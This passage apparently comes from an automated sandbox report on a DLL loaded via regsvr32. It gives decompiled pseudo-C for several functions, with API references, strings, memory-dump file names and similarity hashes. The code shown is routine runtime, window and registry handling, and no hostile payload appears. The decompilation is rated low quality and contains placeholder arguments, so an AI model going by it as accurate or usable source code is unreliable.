                                                                              • Instruction Fuzzy Hash: 9A31693A2047818AC631CF12E04035EB364F789B96F554216EFDE4BB58CF39E945CB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003DE40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E1003DE40(long long __rbx, long long __rdi, long long __rsi, void* __r8, void* __r12, void* __r13, void* __r14, char _a8, long long _a16, long long _a24, long long _a32) {
				char _v24;
				long long _v40;
				long long _t42;
				long long _t44;
				char* _t45;
				long long _t53;
				long long _t56;
				long long _t58;
				signed long long _t59;
				void* _t62;
				void* _t63;
				void* _t67;
				void* _t68;
				void* _t69;

				_t69 = __r14;
				_t68 = __r13;
				_t67 = __r12;
				_t63 = __r8;
				_t58 = __rsi;
				_t53 = __rdi;
				_t44 = __rbx;
				if( *0x100774b8 == 0) {
					E10047B70();
				}
				_a16 = _t44;
				_a32 = _t53;
				r8d = 0x104;
				 *0x10075464 = 0;
				GetModuleFileNameA(??, ??, ??);
				_t45 =  *0x100774c8;
				 *0x10074d98 = 0x10075360;
				if(_t45 == 0 ||  *_t45 == 0) {
					_t45 = 0x10075360;
				}
				r8d = 0;
				_a24 = _t58;
				_v40 =  &_v24;
				E1003DC00(_t45, _t45, 0x10075360, 0x10075360, _t58, _t62, _t63,  &_a8, _t67, _t68, _t69);
				_t59 = _a8;
				if(_t59 >= 0xffffffff) {
					L10:
					return 0xffffffff;
				} else {
					_t42 = _v24;
					if(_t42 >= 0xffffffff) {
						goto L10;
					} else {
						_t49 = _t42 + _t59 * 8;
						if(_t42 + _t59 * 8 < _t42) {
							goto L10;
						} else {
							E1003D3A0(0, _t42, _t45, _t49, 0x10075360, _t59, _t62);
							_t56 = _t42;
							if(_t42 == 0) {
								goto L10;
							} else {
								_v40 =  &_v24;
								E1003DC00(_t45, _t45, _t56, _t56, _t59, _t62, _t42 + _t59 * 8,  &_a8, _t67, _t68, _t69);
								r11d = _a8;
								 *0x10074d68 = _t56;
								r11d = r11d + 0xffffffff;
								 *0x10074d60 = r11d;
								return 0;
							}
						}
					}
				}
			}

















                                                                              0x1003de40
                                                                              0x1003de40
                                                                              0x1003de40
                                                                              0x1003de40
                                                                              0x1003de40
                                                                              0x1003de40
                                                                              0x1003de40
                                                                              0x1003de4b
                                                                              0x1003de4d
                                                                              0x1003de4d
                                                                              0x1003de52
                                                                              0x1003de57
                                                                              0x1003de63
                                                                              0x1003de6e
                                                                              0x1003de75
                                                                              0x1003de7b
                                                                              0x1003de85
                                                                              0x1003de8c
                                                                              0x1003de93
                                                                              0x1003de93
                                                                              0x1003dea0
                                                                              0x1003dea8
                                                                              0x1003dead
                                                                              0x1003deb2
                                                                              0x1003deb7
                                                                              0x1003dec9
                                                                              0x1003df37
                                                                              0x1003df4f
                                                                              0x1003decb
                                                                              0x1003decb
                                                                              0x1003ded4
                                                                              0x00000000
                                                                              0x1003ded6
                                                                              0x1003ded6
                                                                              0x1003dedd
                                                                              0x00000000
                                                                              0x1003dedf
                                                                              0x1003dedf
                                                                              0x1003dee7
                                                                              0x1003deea
                                                                              0x00000000
                                                                              0x1003deec
                                                                              0x1003df00
                                                                              0x1003df05
                                                                              0x1003df0a
                                                                              0x1003df0f
                                                                              0x1003df16
                                                                              0x1003df1c
                                                                              0x1003df36
                                                                              0x1003df36
                                                                              0x1003deea
                                                                              0x1003dedd
                                                                              0x1003ded4

                                                                              APIs
                                                                              • __initmbctable.LIBCMT ref: 1003DE4D
                                                                              • GetModuleFileNameA.KERNEL32(?,?,?,?,?,?,?,?,1003928D), ref: 1003DE75
                                                                              Strings
                                                                              • C:\Windows\System32\regsvr32.exe, xrefs: 1003DE5C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName__initmbctable
                                                                              • String ID: C:\Windows\System32\regsvr32.exe
                                                                              • API String ID: 3548084100-2355580720
                                                                              • Opcode ID: ac65b9eec87d50526ea049801f36ae1baafd10cfcc523d9a5b512130d7c54300
                                                                              • Instruction ID: aefafe994211fec3a0d0576ce2d192826de1e3903f86e9fffe58ae89f6f45173
                                                                              • Opcode Fuzzy Hash: ac65b9eec87d50526ea049801f36ae1baafd10cfcc523d9a5b512130d7c54300
                                                                              • Instruction Fuzzy Hash: D7214F35615B8089DB11DB51B440389B7A5F789BF5F460326EAED4BBE8DBBCD540CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10025AA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 32%
                                                                              			E10025AA8(void* __rcx, void* __r9) {
				signed int _v24;
				char _v552;
				char _v568;
				long _t13;
				void* _t16;
				intOrPtr _t22;
				signed long long _t33;
				signed long long _t34;
				long long* _t35;
				void* _t38;
				long long _t44;
				void* _t52;
				void* _t53;
				void* _t54;
				signed long long _t55;
				void* _t57;

				_t57 = __r9;
				_t33 =  *0x1006f4c8; // 0x6f13091946cb
				_t34 = _t33 ^ _t55;
				_v24 = _t34;
				r8d = 0x104;
				_t13 = GetModuleFileNameW(??, ??, ??);
				if(_t13 != 0 && _t13 != 0x104) {
					__imp__PathFindExtensionW();
					_t44 = L"%s.dll"; // 0x64002e00730025
					_t58 = _t34;
					_t35 =  &_v568;
					 *_t35 = _t44;
					_t22 =  *0x1005ab58; // 0x6c006c
					 *((intOrPtr*)(_t35 + 8)) = _t22;
					_t21 =  *0x1005ab5c & 0x0000ffff;
					 *((short*)(_t35 + 0xc)) =  *0x1005ab5c & 0x0000ffff;
					_t9 = (_t34 -  &_v552 >> 1) + 7; // 0x7
					_t37 = _t9;
					if(_t9 >  &_v552) {
						goto L12;
					} else {
						_t56 =  &_v568;
						_t16 = E1003B730(_t37, _t38, _t58,  &_v552 - _t47, _t52, _t53, _t54,  &_v568);
						if(_t16 != 0) {
							if(_t16 == 0xc) {
								L10:
								E100164FC();
								asm("int3");
							} else {
								if(_t16 == 0x16 || _t16 == 0x22) {
									L9:
									E10016544();
									asm("int3");
									goto L10;
								} else {
									if(_t16 != 0x50) {
										E10016544();
										asm("int3");
										goto L9;
									}
								}
							}
						}
						E10025520( &_v552, _t56, _t57, _t58);
					}
				}
				return E10038D20(_t21, _v24 ^ _t55);
			}



















                                                                              0x10025aa8
                                                                              0x10025aaf
                                                                              0x10025ab6
                                                                              0x10025ab9
                                                                              0x10025acd
                                                                              0x10025ad3
                                                                              0x10025adb
                                                                              0x10025af1
                                                                              0x10025af7
                                                                              0x10025b03
                                                                              0x10025b06
                                                                              0x10025b0b
                                                                              0x10025b0e
                                                                              0x10025b14
                                                                              0x10025b17
                                                                              0x10025b1e
                                                                              0x10025b30
                                                                              0x10025b30
                                                                              0x10025b37
                                                                              0x00000000
                                                                              0x10025b39
                                                                              0x10025b3c
                                                                              0x10025b44
                                                                              0x10025b4b
                                                                              0x10025b50
                                                                              0x10025b6d
                                                                              0x10025b6d
                                                                              0x10025b72
                                                                              0x10025b52
                                                                              0x10025b55
                                                                              0x10025b67
                                                                              0x10025b67
                                                                              0x10025b6c
                                                                              0x00000000
                                                                              0x10025b5c
                                                                              0x10025b5f
                                                                              0x10025b61
                                                                              0x10025b66
                                                                              0x00000000
                                                                              0x10025b66
                                                                              0x10025b5f
                                                                              0x10025b55
                                                                              0x10025b50
                                                                              0x10025b78
                                                                              0x10025b78
                                                                              0x10025b37
                                                                              0x10025b98

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32 ref: 10025AD3
                                                                              • PathFindExtensionW.SHLWAPI ref: 10025AF1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExtensionFileFindModuleNamePath
                                                                              • String ID: %s.dll
                                                                              • API String ID: 2295281026-3668843792
                                                                              • Opcode ID: d5f079f705b00c93528733eb723d1bea99f092d675caa828ddce8118d6b69a9b
                                                                              • Instruction ID: a70e0c6663d4781cdcc43664c69e271d37602d799a7520247bcc3b45336bf644
                                                                              • Opcode Fuzzy Hash: d5f079f705b00c93528733eb723d1bea99f092d675caa828ddce8118d6b69a9b
                                                                              • Instruction Fuzzy Hash: B3119035721A8046EA52CB10E8943A97391F7CDB81F914422DA8F83B64EF79C584CB08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000EC10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 10029CB8: ClientToScreen.USER32 ref: 10029CCA
                                                                                • Part of subcall function 10029CB8: GetWindow.USER32 ref: 10029CD8
                                                                                • Part of subcall function 10029CB8: GetDlgCtrlID.USER32 ref: 10029CE9
                                                                                • Part of subcall function 10029CB8: GetWindowLongW.USER32 ref: 10029CFC
                                                                                • Part of subcall function 10029CB8: GetWindowRect.USER32 ref: 10029D10
                                                                                • Part of subcall function 10029CB8: PtInRect.USER32 ref: 10029D20
                                                                              • GetDlgCtrlID.USER32 ref: 1000EC33
                                                                              • SendMessageW.USER32 ref: 1000EC6C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CtrlRect$ClientLongMessageScreenSend
                                                                              • String ID: 8
                                                                              • API String ID: 1956310361-4194326291
                                                                              • Opcode ID: 1371b80996037db6ee49b4a39d4a808a974c4e71451b1dbb1951edfc5a21bba2
                                                                              • Instruction ID: 3b23d7a2283954c23c519b6e06dcd06da3711bf5deb242af0fe5df540a2b1b0d
                                                                              • Opcode Fuzzy Hash: 1371b80996037db6ee49b4a39d4a808a974c4e71451b1dbb1951edfc5a21bba2
                                                                              • Instruction Fuzzy Hash: B001D13270279086FB458F26AE06B587690E745FF9F188324DE790B7D8DF39C8828310
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100320A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 10031F88: RegOpenKeyExW.ADVAPI32 ref: 10031FCB
                                                                                • Part of subcall function 10031F88: RegCreateKeyExW.ADVAPI32 ref: 1003201E
                                                                                • Part of subcall function 10031F88: RegCreateKeyExW.ADVAPI32 ref: 1003206A
                                                                                • Part of subcall function 10031F88: RegCloseKey.ADVAPI32 ref: 1003207D
                                                                                • Part of subcall function 10031F88: RegCloseKey.ADVAPI32 ref: 10032090
                                                                              • RegCreateKeyExW.ADVAPI32 ref: 10032105
                                                                              • RegCloseKey.ADVAPI32 ref: 1003210E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreate$Open
                                                                              • String ID: PreviewPages
                                                                              • API String ID: 1740278721-1913510653
                                                                              • Opcode ID: 55ac34d0b8a18537e07d8ad0608603d11b560bc71dfe688365e0b8753dc124c2
                                                                              • Instruction ID: 2205b9d4c42b043e4fd6d76351798613d78f40bede9966a35f300d1af4bcf55c
                                                                              • Opcode Fuzzy Hash: 55ac34d0b8a18537e07d8ad0608603d11b560bc71dfe688365e0b8753dc124c2
                                                                              • Instruction Fuzzy Hash: 5AF03036215B8486DBA18B11F94978AB2A4FB8CBD9F555124DFCD47B54DF7CC0988F00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%